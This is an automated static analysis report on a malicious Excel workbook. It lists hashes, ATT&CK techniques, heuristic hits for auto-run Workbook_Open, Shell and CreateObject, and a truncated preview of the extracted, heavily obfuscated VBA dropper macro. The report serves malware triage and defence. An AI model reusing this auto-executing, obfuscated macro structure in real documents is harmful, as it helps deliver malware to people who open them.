Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 37f2d49a003f60b5…

MALICIOUS

Office (OOXML)

Size: 29.0 KB
Created: 2018-10-25 13:39:53 UTC
Authoring application: Microsoft Excel 12.0000
First seen: 2019-01-11
MD5: 823f3aba620e0cce091e2f7e7bd1af4e
SHA-1: 45ade80b8f91cad0c987e25314a7024f5d2b78ee
SHA-256: 37f2d49a003f60b543ad2cb9e41a2ef3975cc0468d4fe066ad8240f233b46e3b
Risk Score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The file is an OOXML document containing a Workbook_Open macro, which runs automatically when the workbook is opened and is a common technique for executing malicious code at that point. The macro uses Shell() and CreateObject calls, indicating an attempt to run external commands or download additional payloads. The VBA code is heavily obfuscated with loops and meaningless variable names, making it difficult to determine the exact payload, but the presence of these indicators strongly suggests downloader or dropper functionality.

Heuristics (6)

  • VBA project inside OOXML [severity: medium; 4 related findings; OOXML_VBA]
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA [severity: critical; OLE_VBA_SHELL]
    Shell() call in VBA
  • Workbook_Open macro [severity: high; OLE_VBA_WBOPEN]
    Workbook_Open macro
  • CreateObject call [severity: high; OLE_VBA_CREATEOBJ]
    CreateObject call
  • VBA p-code auto-exec with execution tokens [severity: high; OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact [severity: info; EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 16040 bytes
SHA-256: 6789a8b48e2943ba26778fb4840193dc2d75aff5ad7a5951a0203c82cf3e8cfa
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
jRWAp6Qs.v_OD1WEBp_DlR1EhICRE
While 2 = 6117
Dim CHInlMnOqPbV5XnPJaAjeRqzNXi_Waq3cTymykZ As Variant
Wend
Dim mszTYgpp3Ly As Integer
While 27 = 1181
Dim VrBqjtZRYLnh2Oii3ji_Zi_V1o7QRgqo1hD8 As Variant
Wend
Dim usDLeKL9I8_z As Integer
While 20 = 5683
Dim wESLWwqnz5vG_1e8pRKjrFzev5WwWpp2aTtkUnIOOK4xQDeSq_bn3NNo As Variant
Wend
Dim NwYaY4OIM3 As Integer

While 6 = 2847
Dim pnE3kBH5SeLAMrYC_WLB9K__VgMqzU6sjWVzLwWZe85sbLiqBUx26 As Variant
Wend
Dim K4dhAfDwZD As Integer
While 25 = 5291
Dim ibZzThyQ9veAPUlH7fodfCwXb2PKPSl_36I9vsUcef3Io3MLXVEP As Variant
Wend
Dim tiZeoAVbQm As Integer
While 22 = 8172
Dim nHZFSKlVLIK8_IlshmCw4MUSRemStV3J2fM_Mu4Au92EhkZUBQ As Variant
Wend
Dim xxMzEZwFxxgRlz As Integer
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "jRWAp6Qs"
Dim Z892dil9lCb8oG6eWbUqOpMvuorgnKbuYXwr4b_h11hLMYOFmv3SemgssKFy1DTYjqhPSMj5VwyWFAhTYk41QGOu1C8rTOqveGkfz8vXK8 As String
 Function O__c5ldvsBA4UOtqDPQag_7BYwLF7EbbVA(IESSZhVoeGASGfIXXqqOxQjxHyjMrA1Vh5QccCFgu7FSFt2UmYsDeKF1ddIk8G7dOmuKMp4UjHd1JOqX6NiRQw1Uw)
While 17 = 9288
Dim CUrVkZjtWsL9nJ1fs5z8F2tZu4ovS4LhkkEHnLW514n7lFaFiULCwP5I As Variant
Wend
Dim jQjptwZcenWBD As Integer
While 13 = 7241
Dim r2fg4FLMwxnbgL7qIuSp6gVlqICcJa8sYCzcoe2Ir6wb5LLicuT2CUG As Variant
Wend
Dim Id3ytCrBUz5BdU As Integer
While 22 = 642
Dim bAn2I79t3pc6b9YE_oD4p9uoFE94Zk_JrMAsp92 As Variant
Wend
Dim WGYjLUxjskOuN As Integer

 Dim U2Egf_U7oTKxm4qvlpA6ICI9hio_o8nSaASlF_xsVZ8NIXAxuZMMQibQqE87SOPqo2Uki_nk2Qir_5yIh1SMsZA2hB4AA1XEHPhQBYMpukT_9sLuOxXb6C7NzcBgImjA2bixVgFGmmaG_A2xxGuLb
While 7 = 9150
Dim iocN8uD8_RQoRLN8oX_wovOWhSRdOQJztKHgfdqMxXCFRf As Variant
Wend
Dim CjTt6zoaQw As Integer
While 3 = 9637
Dim XEpnahrwFa4EDpZJpz8OsHDAOrIdTTIR3THZwCvOpN91k As Variant
Wend
Dim enRuHxbADO As Integer
While 7 = 1198
Dim AnWsXLavPkLrg_VmDricILXSKdKiJTy1 As Variant
Wend
Dim P2YHnBzcvLi As Integer


   Dim qCFNwMf8v_El_6GIAf842AH8EH9Wbi9GSSp_J5SvzNhxKpMG2hsKzsGo3GHmNHdKA7RoNC8EKJClaTvX4zd4zwQiK_KCuogqtUvNWh3yim9nodMhUtrWmiULnrbMz5Sfl
While 6 = 8857
Dim svFRWdttaiEwODf3A2j5uTanjM9A1Ep6lXjY As Variant
Wend
Dim W2Jpj_Ypvk2id7a As Integer
While 24 = 7716
Dim lnMWSarIdr2U2HJ1cFdGp4Sp5t18TYe4mvS8IK_6IA As Variant
Wend
Dim J2KCwmZAEWaR As Integer
While 15 = 8216
Dim LqSfbiisx_K7rExLpQBh8orac17MgRRGb As Variant
Wend
Dim SikmlreUYK_oNT As Integer
   
While 12 = 2953
Dim qxMTwT2Tf81CjkUKeuDdWeLhChfLhcmvNfNYS8evi8CluiF3_L As Variant
Wend
Dim pRks6JknPNxovCT As Integer
While 13 = 7578
Dim wDU62fOP5XbivcZmKTwTIdiCwnqO83K_QpuCfDTHBTxfrA2vwI As Variant
Wend
Dim cZO94QcQGMy_QA As Integer
While 14 = 4145
Dim LbPEqWEG9mQypBTuu4awYtsQuchM5FRBBvS As Variant
Wend
Dim OtuDYDTakq_ja As Integer
 Set qCFNwMf8v_El_6GIAf842AH8EH9Wbi9GSSp_J5SvzNhxKpMG2hsKzsGo3GHmNHdKA7RoNC8EKJClaTvX4zd4zwQiK_KCuogqtUvNWh3yim9nodMhUtrWmiULnrbMz5Sfl = CreateObject(Z892dil9lCb8oG6eWbUqOpMvuo
... (truncated)
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: xl/vbaProject.bin
Size: 46592 bytes
SHA-256: 0d0b2b9754222e514ce4048223fd87f46aef35f8f0f7640ba88f457d7206986e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 long base64-like blob(s).